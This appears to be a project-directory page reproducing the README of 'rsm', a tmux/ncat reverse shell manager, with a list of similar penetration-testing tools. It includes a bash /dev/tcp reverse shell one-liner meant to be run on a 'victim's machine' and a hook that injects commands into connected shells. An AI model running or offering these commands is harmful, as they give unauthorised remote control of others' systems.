All Projects → djosix → rsm

djosix / rsm

Licence: other
Reverse shell manager using tmux and ncat

Programming Languages

shell
77523 projects

Projects that are alternatives of or similar to rsm

Garud
An automation tool that scans sub-domains, sub-domain takeover, then filters out XSS, SSTI, SSRF, and more injection point parameters and scans for some low hanging vulnerabilities automatically.
Stars: ✭ 183 (+531.03%)
Mutual labels:  penetration-testing, bash-script
Reverse Shell Cheatsheet
🙃 Reverse Shell Cheat Sheet 🙃
Stars: ✭ 297 (+924.14%)
Mutual labels:  reverse-shell, penetration-testing
Offensive-Reverse-Shell-Cheat-Sheet
Offensive Reverse Shell (Cheat Sheet)
Stars: ✭ 138 (+375.86%)
Mutual labels:  reverse-shell, penetration-testing
reverse-ssh
Statically-linked ssh server with reverse shell functionality for CTFs and such
Stars: ✭ 548 (+1789.66%)
Mutual labels:  reverse-shell, penetration-testing
Print My Shell
Python script wrote to automate the process of generating various reverse shells.
Stars: ✭ 140 (+382.76%)
Mutual labels:  reverse-shell, penetration-testing
Easy hack
Hack the World using Termux
Stars: ✭ 549 (+1793.1%)
Mutual labels:  penetration-testing, bash-script
ReversePowerShell
Functions that can be used to gain Reverse Shells with PowerShell
Stars: ✭ 48 (+65.52%)
Mutual labels:  reverse-shell, penetration-testing
lazyaircrack
Automated tool for WiFi hacking.
Stars: ✭ 301 (+937.93%)
Mutual labels:  penetration-testing, bash-script
Fwdsh3ll
Forward shell generation framework
Stars: ✭ 62 (+113.79%)
Mutual labels:  reverse-shell, penetration-testing
Pwncat
pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
Stars: ✭ 904 (+3017.24%)
Mutual labels:  reverse-shell, penetration-testing
YAPS
Yet Another PHP Shell - The most complete PHP reverse shell
Stars: ✭ 35 (+20.69%)
Mutual labels:  reverse-shell, penetration-testing
webrecon
Automated Web Recon Shell Scripts
Stars: ✭ 48 (+65.52%)
Mutual labels:  penetration-testing, bash-script
Chimera
Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.
Stars: ✭ 463 (+1496.55%)
Mutual labels:  reverse-shell, penetration-testing
Hrshell
HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.
Stars: ✭ 193 (+565.52%)
Mutual labels:  reverse-shell, penetration-testing
Reconky-Automated Bash Script
Reconky is an great Content Discovery bash script for bug bounty hunters which automate lot of task and organized in the well mannered form which help them to look forward.
Stars: ✭ 167 (+475.86%)
Mutual labels:  penetration-testing, bash-script
shell
Python 3 Reverse Shell
Stars: ✭ 22 (-24.14%)
Mutual labels:  reverse-shell
vsaudit
VOIP Security Audit Framework
Stars: ✭ 104 (+258.62%)
Mutual labels:  penetration-testing
GRC-SECURITY-NOW-PODCAST-DOWNLOAD-SCRIPT
Purpose of this BASH script is to allow easy downloading of Security Now (GRC.Com/SecurityNow) podcasts and files related to it.
Stars: ✭ 23 (-20.69%)
Mutual labels:  bash-script
reconmap
Vulnerability assessment and penetration testing automation and reporting platform for teams.
Stars: ✭ 242 (+734.48%)
Mutual labels:  penetration-testing
kali-live-build
Kali Live Build Scripts
Stars: ✭ 25 (-13.79%)
Mutual labels:  penetration-testing

rsm

A simple reverse shell manager using tmux and ncat.

Install

curl https://raw.githubusercontent.com/djosix/rsm/master/rsm > /usr/local/bin/rsm

Quick Start

Listening on a port and attach to the session. (rsm creates a separated tmux socket, so it will not mess up your tmux sessions)

rsm 14641

On victim's machine, launch a reverse shell. Once the victim connects back, rsm will create a tmux window handling the TCP connection. The only thing you need to do is switching to that window in the rsm tmux session.

bash -c 'bash -i >& /dev/tcp/127.0.0.1/14641 0<&1'

If a rsm session is detached, you can attach to it using this:

rsm attach

Stop the server and cleanup. If no port is specified, rsm will stop all listening sessions.

rsm stop [port1] [port2] [...]

Settings

Hooking the client connection, you can use $IP and $PORT in your command, which correspond to the client:

export RSM_HOOK='echo Hello, you are $IP:$PORT'
rsm d 12345

nc 127.0.0.1 12345

Client gets:

Hello, you are 127.0.0.1:50522

Injecting command to the reverse shell. (stdout of the hook command will be sent to the client socket, stderr will be printed out)

export RSM_HOOK='echo "echo hehe > ~/hacked"'
rsm d 12345

bash -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0<&1'
cat ~/hacked # hehe

Executing a command when rsm starts:

export RSM_WITH='ncat -lk 12345 -c "cat > test.txt"'
rsm d 22222

Other settings:

export RSM_DIR=$HOME/.rsm   # where rsm sockets will be
export RSM_MAX_CONN=32      # maximum number of connections
export RSM_MAX_RECV=32      # maximum receiving mega-bytes
rsm 13370

Usage

$ rsm help
Usage:

    rsm PORT            Start a reverse shell listener on PORT
    rsm d[etached] PORT Start a detached reverse shell listener on PORT
    rsm l[ist]          List active rsm listeners
    rsm i[nfo] PORT     Show details of listener on PORT
    rsm i[nfo]          Show details of all rsm listeners
    rsm s[top] PORT     Stop a rsm listener on PORT
    rsm s[top]          Stop all rsm listeners
    rsm a[ttach] PORT   Attach to a rsm session listening on PORT
    rsm a[ttach]        Attach to the last rsm session
    rsm c[lean] PORT    Clean sockets for PORT
    rsm c[lean]         Clean all sockets
    rsm h[elp]          Show this help message

    Configurable Variables:

        RSM_DIR         Where the rsm sockets be stored (default: /tmp/.rsm)
        RSM_MAX_CONN    Maximum number of connections (default: 128)
        RSM_MAX_RECV    Maximum receiving MB (default: 64)
        RSM_HOOK        Command to eval when a client connects
        RSM_WITH        Command to eval when rsm starts
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].